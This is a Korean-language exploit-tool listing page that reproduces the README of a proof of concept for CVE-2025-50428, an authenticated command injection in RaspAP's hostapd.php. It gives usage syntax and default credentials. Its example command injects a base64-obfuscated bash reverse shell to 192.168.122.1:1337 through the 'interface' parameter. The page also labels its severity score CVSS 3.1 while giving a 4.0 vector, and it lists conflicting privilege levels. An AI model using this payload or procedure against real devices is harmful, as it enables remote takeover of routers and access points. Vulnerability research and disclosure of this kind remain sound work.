Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-50428 — 취약점 CVE-2025-50428에 대한 개념 증명: RaspAP의 인증된 OS 명령어 주입 | Kitploit
도구/GitHubGitHub/security-smarttecs/cve-2025-50428
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & Education
GitHubsecurity-smarttecs/cve-2025-50428

cve-2025-50428

취약점 CVE-2025-50428에 대한 개념 증명: RaspAP의 인증된 OS 명령어 주입

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE Severity Product Version

CVE-2025-50428 - RaspAP 명령 주입

CVE-2025-50428에 대한 개념 증명(PoC) 익스플로잇으로, RaspAP raspap-webgui 3.2.9 및 이전 버전의 명령 주입 취약점입니다.


취약점 IDCVE-2025-50428
심각도높음 (CVSS 3.1: 8.6)
CVSS 벡터CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
취약점 유형코드 주입
공격 경로원격 (인증됨)
필요 권한낮음
영향코드 실행, 권한 상승
영향받는 제품raspap-webgui ≤ 3.2.9
발견자SmartTECS Cyber Security GmbH

설명

이 익스플로잇은 RaspAP의 hostapd.php 스크립트에 존재하는 명령 주입 취약점을 대상으로 합니다. 이 취약점은 interface 매개변수를 통해 전달되는 사용자 입력에 대한 필터링이 미흡하여 발생합니다. 인증된 공격자는 임의의 OS 명령을 주입할 수 있으며, 그 결과 www-data 사용자의 권한으로 코드가 실행됩니다.

취약한 버전

  • raspap-webgui ≤ 3.2.9

요구 사항

  • Python 3.x
  • requests 라이브러리 설치
  • 취약한 버전의 RaspAP를 실행 중인 대상
  • 유효한 RaspAP 로그인 자격 증명

사용 방법

root@kitploit:~
python3 poc.py --base-url <url> --interface <payload> [--username <username>] [--password <password>]

매개변수

  • --base-url: RaspAP 설치의 기본 URL (예: http://192.168.122.22)
  • --interface: interface 매개변수의 값, 인젝션 페이로드 허용
  • --username: RaspAP 사용자 이름 (기본값: admin)
  • --password: RaspAP 비밀번호 (기본값: secret)

예시

root@kitploit:~
python3 poc.py --base-url http://192.168.122.22 --interface "';echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMi4xLzEzMzcgMD4mMTs= | base64 -d | bash"

작동 원리

  1. 스크립트는 제공된 자격 증명을 사용하여 RaspAP 웹 인터페이스에 인증합니다.
  2. 서버에서 유효한 CSRF 토큰을 가져옵니다.
  3. 악성 명령 주입 페이로드가 포함된 interface 매개변수와 함께 hostapd.php로 POST 요청을 전송합니다.
  4. 주입된 명령이 www-data 권한으로 대상 시스템에서 실행됩니다.

참고 사항

  • 이 익스플로잇에는 유효한 자격 증명이 필요합니다.
  • 성공적인 악용 시 임의의 명령 실행이 가능하며, 이를 연계하여 권한 상승을 수행할 수 있습니다.

SmartTECS Cyber Security GmbH

SmartTECS Cyber Security GmbH는 침투 테스트, 보안 소프트웨어 개발 및 취약점 연구를 전문으로 하는 사이버 보안 기업입니다. 이 회사는 조직이 진화하는 사이버 위협으로부터 중요 시스템을 보호할 수 있도록 맞춤형 보안 평가, 침해 대응 및 전략적 자문 서비스를 제공합니다.

면책 조항

이 도구는 교육 및 연구 목적으로만 제공됩니다. 소유했거나 명시적 허가를 받아 관리하는 시스템에서만 사용하십시오. 작성자와 SmartTECS Cyber Security GmbH는 오용 또는 손상에 대해 어떠한 책임도 지지 않습니다.

참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2025-50428
도구 다운로드